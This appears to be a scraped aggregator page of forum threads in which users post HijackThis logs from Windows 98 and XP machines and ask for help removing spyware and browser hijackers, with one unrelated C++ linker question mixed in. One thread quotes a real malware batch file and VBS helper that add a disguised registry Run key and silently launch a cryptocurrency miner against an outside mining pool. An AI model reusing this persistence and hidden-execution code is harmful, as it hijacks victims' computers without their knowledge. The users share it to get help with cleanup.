Start_ups.exe - self-executable file with in-built browser and search capabilities

Excel.ZIP - Microsoft Excel 2000 version without the hyperlinks.

Short-list - simple list without search facility for search engine cache purposes

Click to expand...
 

2 more replies
Answer Match 40.74%

Windows 98, please, let me live again- thanks, inadvance, tbh

Logfile of HijackThis v1.98.0
Scan saved at 7:35:43 PM, on 12/15/04
Platform: Windows 98 Gold (Win9x 4.10.1998)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\THOTKEY.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\IRMON.EXE
C:\TOSHIBA\MOUSE\TMOUSE.EXE
C:\WINDOWS\SYSTEM\STIMON.EXE
C:\WINDOWS\SYSTEM\EVENTMGR.EXE
C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\OSA.EXE
C:\PROGRAM FILES\WINZIP\WZQKPICK.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\WINDOWS\SYSTEM\TAPISRV.EXE
C:\WINDOWS\SYSTEM\RNAAPP.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\PROGRAM FILES\MOZILLA FIREFOX\FIREFOX.EXE
C:\UNZIPPED\HIJACKTHIS\HIJACKTHIS.EXE

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = about:NavigationFailure
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = about:NavigationFailure
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = about:NavigationFailure
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = about:NavigationFailure
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = about:NavigationFailure
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = about:NavigationFailure
R1 - HK... Read more

A:hijack this log- please interpret as so i can fix

15 more replies
Answer Match 40.74%

Friends
ok I now have the problem child in my hands. working on a relatively fresh XP load. It did this time allow me to install SP2. That appears to have gone ok. There was a lot of downloaded "Adult this and that" in folders that had been auto-created by some invader. not sure which.
I have NOT connected to internet yet [cable not plugged in at all]
Windows Security/firewall is NOT running because it cannot load ICS. I assume [please correct me] that ICS will not load because the TCP/IP stack is not loading because of no network detect. This is a Dell system equipped for Wake-on-Lan so the NIC chip is always getting trickle power

Here is the Hijackthis log:
Logfile of HijackThis v1.98.2
Scan saved at 7:47:39 AM, on 12/21/2004
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\hkcmd.exe
C:\WINDOWS\system32\wupdmgt.exe
C:\WINDOWS\system32\scvhosting.exe
C:\WINDOWS\system32\WINS.exe
C:\Documents and Settings\Owner\My Documents\Techwest\aiepk2.exe
C:\WINDOWS\system32\nvsc32.exe
C:\Program Files\ISTsvc\istsvc.exe
C:\WINDOWS\kpxyugyr.exe
C:\Program Files\Internet Optimizer\optimize.exe
C:\program files\180solutions\sais.exe
C:\Program Files\Power Scan\powerscan.exe
C:\Program Fi... Read more

A:Help Interpret Hijackthis log: win XP

PLEASE guys
 

1 more replies
Answer Match 40.74%

Hi everyone. I'm grateful for all you experts. Thank you for the help!
Logfile of HijackThis v1.99.1
Scan saved at 9:01:52 PM, on 2/16/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\brsvc01a.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\brss01a.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\hkcmd.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\BroadJump\Client Foundation\CFD.exe
C:\Program Files\Visual Networks\Visual IP InSight\SBC\IPClient.exe
C:\Program Files\Visual Networks\Visual IP InSight\SBC\IPMon32.exe
C:\PROGRA~1\SBCSEL~1\SMARTB~1\MotiveSB.exe
C:\Program Files\Viewpoint\Viewpoint Manager\ViewMgr.exe
C:\Program Files\Gateway Utilities\GWInkMonitor.exe
C:\Program Files\IE New Window Maximizer\iemaximizer.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\PROGRA~1\Iomega\System32\AppServices.exe
C:\Program Files\Common Files\Lanovation\PrismXL\PRISMXL.SYS
C:\WINDOWS\System32\spss_lmd.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Iomega\AutoDisk\ADService.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Progr... Read more

A:Please help me interpret my Hijack Log

You know I have an idea that would help everyone help you,,,,there is so much in that log that it would take an hour and a half just to research it all....man o man thats a lot...lets see if you can narrow it down abit by doing this...click the link below then install,,,update and run adaware..When you get the scan finished and you get to the part where you have to check the boxes one by one do this (right click and select all).

Click the link below and download the free version at the top left. Then post another hijack log and it should be substaintally smaller.

http://www.download.com/Ad-Aware-SE...045910.html?part=dl-ad-aware&subj=dl&tag=top5
 

3 more replies
Answer Match 40.74%

Newbie here and hoped someone could help interpret the log on my parents PC. Have run both SpyBot & Adaware but the IE home page has been hijacked for months and help would ensure I don't screw it up

Thanks very much in advance for your help..

Logfile of HijackThis v1.97.7
Scan saved at 5:06:30 PM, on 6/26/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Network Associates\Common Framework\FrameworkService.exe
C:\Program Files\Network Associates\VirusScan\Mcshield.exe
C:\Program Files\Network Associates\VirusScan\VsTskMgr.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\mfcuo.exe
C:\windows\system\hpsysdrv.exe
C:\HP\KBD\KBD.EXE
C:\WINDOWS\System32\hkcmd.exe
C:\PROGRAM FILES\Movie Maker\RealPlay.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb06.exe
C:\Program Files\Network Associates\VirusScan\SHSTAT.EXE
C:\Program Files\Network Associates\Common Framework\UpdaterUI.exe
C:\WINDOWS\system32\mfcbv.exe
C:\Documents and Settings\Owner\Local Settings\Temp\Temporary Directory 3 for hijackthis.zip\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = res://C:\WINDOWS\dlxoe.dll/sp.html#37049
R0 - HKCU\Software\Micros... Read more

A:PLEASE Help Interpret Hijack Log

16 more replies
Answer Match 40.74%

My browser keeps booting up on about:blank rather that netscape.com. Even if I reset it under Tools-Internet OPtions-Set home page, irt reverts back when rebooted. I ran cwshredder, lava adware, and spybot. When I ran Hijack this, I removed several items in the R1 Category and the one that states about blank. They come back upon reboot. Help appreciated. Dennis

Logfile of HijackThis v1.97.7
Scan saved at 8:05:32 PM, on 6/23/04
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\ZONELABS\VSMON.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\PROGRAM FILES\NORTON ANTIVIRUS\NAVAPW32.EXE
C:\WINDOWS\SYSTEM\STIMON.EXE
C:\PROGRAM FILES\ZONE LABS\ZONEALARM\ZLCLIENT.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\PROGRAM FILES\WEBWASHER\WWASHER.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\MY DOCUMENTS\HJT\HIJACKTHIS.EXE

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = file://C:\WINDOWS\TEMP\sp.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = file://C:\WINDOWS\TEMP\sp.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = file://C:\WINDOWS\TEMP\sp.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = file://C:\WINDOWS\TEMP\sp.html
R1 - HKLM\Software\Microsoft\Internet Explor... Read more

More replies
Answer Match 40.74%

i have downloaded and followed the directions given to others for their lost control panel and spyware popups which i have been experiencing. can someone please tell me what to do next. VERY appreciative!! i have windows xp. i am new at this so please bear with me i am trying to watch for a response. thank you in advance!!
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:53:02 PM, on 9/28/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\ACS.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\Program Files\Toshiba\Power Management\CeEPwrSvc.exe
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\WINDOWS\system32\DVDRAMSV.exe
C:\WINDOWS\system32\svchost.exe
c:\TOSHIBA\Ivp\Swupdate\swupdtmr.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\Program Files\TOSHIBA\Power Management\CePMTray.exe
C:\WINDOWS\system32\dla\tfswctrl.exe
C:\Program Files\ltmoh\Ltmoh.exe
C:\WINDOWS\AGRSMMSG.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\EzButton\EzButton.EXE
C:\Program F... Read more

A:please interpret my hijack log!!

Download Superantispyware (SAS) free home version

http://www.superantispyware.com/superantispywarefreevspro.html

Install it and double-click the icon on your desktop to run it.
It will ask if you want to update the program definitions, click Yes.
Under Configuration and Preferences, click the Preferences button.
Click the Scanning Control tab.
Under Scanner Options make sure the following are checked:
o Close browsers before scanning
o Scan for tracking cookies
o Terminate memory threats before quarantining.
o Please leave the others as they were.
o Click the Close button to leave the control center screen.
On the main screen, under Scan for Harmful Software click Scan your computer.
On the left check C:\Fixed Drive.
On the right, under Complete Scan, choose Perform Complete Scan.
Click Next to start the scan. Please be patient while it scans your computer.
After the scan is complete a summary box will appear. Click OK.
Make sure everything in the white box has a check next to it, then click Next.
It will quarantine what it found and if it asks if you want to reboot, click Yes.
To retrieve the removal information for me please do the following:
o After reboot, double-click the SUPERAntispyware icon on your desktop.
o Click Preferences. Click the Statistics/Logs tab.
o Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.
o It will open in your default text editor (such as Notepad/Wordpad).
o Please highlight everything in the notepa... Read more

1 more replies
Answer Match 40.74%

My IBM Thinkpad with XP has been running slowly and programs start by themselves. I had a similar problem with another computer so I did what worked there. I need someone to interpret HiJackThis.

I downloaded and ran
--- SpyBot Search and Destroy
--- AdAware Se
--- Housecall
--- Panda

This is the HiJack This Log

Logfile of HijackThis v1.96.0
Scan saved at 9:06:53 AM, on 1/5/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\ibmpmsvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\drivers\trcboot.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\Program Files\Personal Communications\PCS_AGNT.EXE
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\System32\drivers\ldlcserv.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton Utilities\NPROTECT.EXE
C:\WINDOWS\System32\QCONSVC.EXE
C:\Program Files\Speed Disk\nopdb.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\fxssvc.exe
C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\system32\tp4serv.exe
C:\PROGRA~1\ThinkPad\PkgMgr\HOTKEY\... Read more

A:Please interpret HiJackThis

This is a very old version of HJT . . download the new 1.99 version here:

http://www.majorgeeks.com/download3155.html

wrs
 

2 more replies
Answer Match 40.74%

Hi! I stumbled upon this board - hopefully someone here can help me. I found the viruses worm_spybot.b and backdoor.sdbot.gen on my computer. I've deleted the files that contained them with a system cleaner, and I've deleted one key registry related to them, but I'm not sure what else to delete. I ran hijackthis, so can someone please interpret my log to help me get rid of these little suckers? Thanks. -Lacey-

Logfile of HijackThis v1.97.2
Scan saved at 2:26:16 PM, on 9/17/2003
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\WScript.exe
C:\Program Files\Trend Micro\PC-cillin 2000\Pop3trap.exe
C:\Program Files\Trend Micro\PC-cillin 2000\WebTrapNT.exe
C:\Program Files\Common Files\Logitech\QCDriver\LVCOMS.EXE
C:\WINDOWS\System32\ndmonNT.exe
C:\Program Files\Internet Neighborhood\clipmon.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\System32\P2P Networking\P2P Networking.exe
C:\WINDOWS\System32\explorer32.exe
D:\PROGRA~1\PERSON~1\MpfTray.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\ClearSearch\Loader.exe
C:\PROGRA~1\Softwin\BITDEF~1\bdmcon.exe
D:\America Online 9.0\aoltray.exe
C:\PROGRA~1\COMMON~1... Read more

A:interpret hijackthis log?

14 more replies
Answer Match 40.74%

Heya, I'm hoping someone could tell me how to get around this error... I'm compiling using c# (could this be a problem?)

The actual error is

"Exception error LNK2019: unresolved external symbol "public: char * __cdecl String:rint(void)" ([email protected]@@QAAPADXZ) referenced in function "public: __thiscall Exception::Exception(class String *)" ([email protected]@[email protected]@@@Z)"

which as far as I can make out means I'm using the wrong calling convention somewhere?... source code is in several parts... The error occurs when linking for Exception.cpp

-----------------------------------------------------------
// Exception.h
#include "String/String.h"
class Exception
{
public:
Exception();
Exception(const String &s);
Exception::Exception(String *s);
};

/**************/
// Exception.cpp
#include <stdio.h>
#include "Exception.h"

Exception::Exception()
{
printf("\n!!! Unknown exception\n");
printf(" FILE : %s \n", __FILE__);
printf(" LINE : %d \n\n", __LINE__);
}

Exception::Exception(String *s)
{
printf("\n!!! %s", s->print());
printf(" FILE : %s \n", __FILE__);
printf(" LINE : %d \n\n", __LINE__);
}

Exception::Exception(const String &s)
{
//printf("\n!!! %s", s.print());
printf(" FILE : %s \n", __FILE__);
printf(" LINE : %d \n\n", __LINE__);
}
/********************/

// String.h

... Read more

More replies
Answer Match 40.74%

Could someone check this HT log?
I got a whole load of spyware/crapware bundled together with free stuff. My AVG said there was a backdoor trojan and that I should run the AVG programme, so I did, and then it didn't find anything.

I managed to uninstall new.net, web hancer, Web Search Toolbar, Top Rebates, and this really persistent file that kept regenerating whenever I deleted it (WToolsA.exe) but I never found the trojan. I ran Security Task Manager, and it said I needed to switch off msimn.exe to continue, so I did with the ctrl/alt/delete function. But I never found that programme either, although it is apparently part of Outlook Express....

This is a work computer, and I don't know who else has been using it, so the above is all I know.
Logfile of HijackThis v1.98.2
Scan saved at 15:51:27, on 12/11/2004
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Grisoft\AVG6\avgcc32.exe
C:\WINDOWS\StartupMonitor.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRA~1\Grisoft\AVG6\avgserv.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
C:\Program... Read more

A:Hijack This Log: can somebody interpret it for me?

Go to Start > Run and type %temp% in the Run box, press OK . The Temp folder will open. Click Edit > Select All then Edit > Delete to delete the entire contents of that Temp folder.

then go to C:\windows\temp and select EVERYTHING except temporary internet files, cookies and history folders and delete all that and then do the same for C:\temp

1) Open Control Panel
2) Click on Internet Options
3) On the General Tab, in the middle of the screen, click on Delete Files
4) You may also want to check the box "Delete all offline content"
5) Click on OK and wait for the hourglass icon to stop after it deletes the temporary internet files
6) You can now click on Delete Cookies and click OK to delete cookies that websites have placed on your hard drive

then
Reboot &

Download and unzip or install this program/application if you haven't already got it. If you have it, then make sure it is updated and configured as described

AdAware SE from http://www.lavasoft.de/support/download
and while you are at the adaware site download and install http://www.lavasoft.de/software/addons/vx2cleaner.shtml
and run it before the main adaware scan and follow it's directions
Run ADAWARE

Before you scan with AdAware, check for updates of the reference file by using the "webupdate".
the current ref file should read at least SE1R18 08.11.2004 or a higher number/later date

Set up the Configurations as follows:

General Button
Safety:
Check (Green) all thre... Read more

1 more replies
Answer Match 40.74%

I have gone through the log and looked up most of the files, i want to delete a few but am not confident about it. can anyone help me by looking at my log for known malicious files? I would greatly appreciate any help you can give me.

thank you,
isaidsnap
 

A:can anyone help me interpret my hijackthis log?

16 more replies
Answer Match 40.74%

Good Morning All,

My system was really slow one morning. Task manager showed that Internet Download Manager was running even though I never install it. I found it's location in "users/(my account)/appdata/roaming/adobe/flashplayer/purecache". It was taking quite a bit of the CPU.

A search on the net showed that it was probably some kind of malware script that was running. It started itself every time I booted up in the morning through an entry in the registry. I don't know how long I've had it on my system.

The bat file that started it was:
@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x

The vbs script file in the same folder as the bat file was:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

I have since removed all of the entries from my system, but am concerned about what may have been happening, as I don't know how long this has been on my system.

Could someone please interpret the bat and script files for me.

Thank you
 

A:Need someone to interpret a bat file

Not sure what it does, but Dr.Web flags it as a Trojan.Downloader:

http://vms.drweb.com/virus/?i=4032145

If you wish, you may click on the Report button and kindly ask for a malware removal specialist's assistance.
 

2 more replies
Answer Match 40.74%

Greetings!

Kindly look, read, and interpret this HJT logfile so that I can remove all the annoying files... Please help me get rid of them.... Thanks!

Logfile of HijackThis v1.98.2
Scan saved at 12:29:48 PM, on 11/3/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Trend Micro\PC-cillin 2002\Tmntsrv.exe
C:\WINDOWS\System32\pctspk.exe
C:\WINDOWS\System32\PV92Tray.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Common Files\CMEII\CMESys.exe
C:\Program Files\Trend Micro\PC-cillin 2002\PCCPFW.exe
C:\Program Files\Trend Micro\PC-cillin 2002\pccguide.exe
C:\Program Files\Trend Micro\PC-cillin 2002\PCCClient.exe
C:\Program Files\Trend Micro\PC-cillin 2002\Pop3trap.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\Date Manager\DateManager.exe
C:\Program Files\Common Files\GMT\GMT.exe
C:\Program Files\PrecisionTime\PrecisionTime.exe
C:\WINDOWS\System32\wuauclt.exe
C:\Documents and Settings\USER\Local Settings\Temp\Temporary Directory 1 for hijackthis.zip\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://results.dashbar.com/search?c=27440&b=17862&t=0&ce=DI&m=NDcxNjM3NTY2&ver=2.1.0.0
O3 - Toolbar:... Read more

A:Solved: pls. interpret this

Thanks
 

3 more replies
Answer Match 40.74%

Hello there,

I ran Hijack and don't recognize a few lines. I was hoping to get an expert opinion.

Thanks.

Logfile of HijackThis v1.98.2
Scan saved at 11:55:18 PM, on 10/8/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton AntiVirus\AdvTools\NPROTECT.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Adaptec\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Hijack\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://mail.yahoo.com/
R3 - URLSearchHook: (no name) - {00D6A7E7-4A97-456f-848A-3B75BF7554D7} - (no file)
O2 - BHO: myBar BHO - {0494D0D1-F8E0-41ad-92A3-14154ECE70AC} - C:\Program Files\MyWay\myBar\2.bin\MYBAR.DLL
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: NAV Helper - {... Read more

A:Interpret Hijack Log

7 more replies
Answer Match 40.74%

hi -- last week my husband's computer wiped itself out (temporarily) and we contacted an online service to find the cause. they said it could be a virus and connected me to their virus removal dept. i was told if there is no virus, i would get my money back ($85).
the lady that did the "cleaning" was IMO an uneducated helper, hired to run software. i vaguely doubted that what ComboFix deleted were viruses (i have removed malware myself several times in the past), but she was adamant about it.

since it didn't fix the problem, she claimed the computer had been hacked and that was that.... eventually a friend's techie restored the files (long story).

i would like to post the ComboFix.txt file to you for your evaluation. if you agree there was no virus (we have Mcaffe installed & current) i will try to get my money back. bwt, i could just barely stop her from deleting the report......!

thanks for your time.

A:pls interpret Combofix txt

Hi,We don't accept ComboFix logs in this forum. Instead;Please download Malwarebytes Anti-Malware (v1.44) and save it to your desktop.Download Link 1Download Link 2MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.
For instructions with screenshots, please refer to the How to use Malwarebytes' Anti-Malware Guide.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself. Press the OK button to close that box and continue.If you encounter any problems while downloading the definition updates, manually download them from here and just double-click on mbam-rules.exe to install.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.The scan will begin and "Scan ... Read more

1 more replies
Answer Match 40.74%

Hello. I am having issues with search engine redirecting and windows update not working. I believe it started earlier this week when I was infected with Antimalware Doctor. I removed it with Malwarebytes and all seemed well for a couple of days. Then I noticed the Windows Update icon in the lower right of my screen, but I could not click on it. When I put my curser on it the message I got was "Installing Updates 0%". I tried loading the windows update webpage, but it would not load. I did some researching through Google on the topic and that is when I started to experience the redirect issue. I ran a virus scan with Vipre which identified a few threats which were removed. I rebooted, but the problems remained. I then ran Spybot and fixed those issues, but the problems remained. I then ran a full Malwarebytes scan and rebooted, but the problems remained. I have since downloaded HijackThis and ran a scan. Below is my log. Please help to interpret. I have tried posting this topic on the infected computer, but it won?t allow it. I get the same unable to load page I get when I try to access windows update. I am posting from another computer just to be able to submit. This is messed up! Thanks!Logfile of Trend Micro HijackThis v2.0.4Scan saved at 2:58:46 PM, on 6/11/2010Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v8.00 (8.00.6001.18702)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WIN... Read more

A:HijackThis log: Please help interpret

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

2 more replies
Answer Match 40.74%

Hi,

My e-mail account on Yahoo was hacked and it was used to send an e-mail to my address book. I ran my Kaspersky Anti-Virus and it didn't tell me that it found anything. So, I read that I could use HiJack This and post the log here for folks to tell me if they see anything in this list that may be of concern (or the culprit for my e-mail account being used).

Could someone look at this for me and let me know?
Also, would it be your recommendation to close my e-mail account?
Should I be worried about other information on my computer, or are these hacks typically isolated to using e-mail to send viruses around? (Do I need to change all my account logins on other Web sites, etc.?)

Thank you for your help.

A:Interpret my HiJack This log?

Hello and welcome to Tech Support Forum.

My name is km2357 and I will be helping you to remove any infection(s) that you may have.

I will be giving you a series of instructions that need to be followed in the order in which I give them to you.

If for any reason you do not understand an instruction or are just unsure then please do not guess, simply post back with your questions/concerns and we will go through it again.

Please do not start another thread or topic, I will assist you at this thread until we solve your problems.

Lastly the fix may take several attempts and my replies may take some time but I will stick with it if you do the same.

Sorry for the delay in replying, the forum is very busy. If you still need help, please do the following:


Step # 1 Download and run DDS

Download DDS and save it to your desktop from here or here.
Disable any script blocker, and then double click dds.scr to run the tool.When done, DDS will open two (2) logs: DDS.txt
Attach.txt

Save both reports to your desktop. Post them back to your topic.



Step # 2: Download and Run Gmer

Please download gmer.zip from Gmer and save it to your desktop.

***Please close any open programs ***

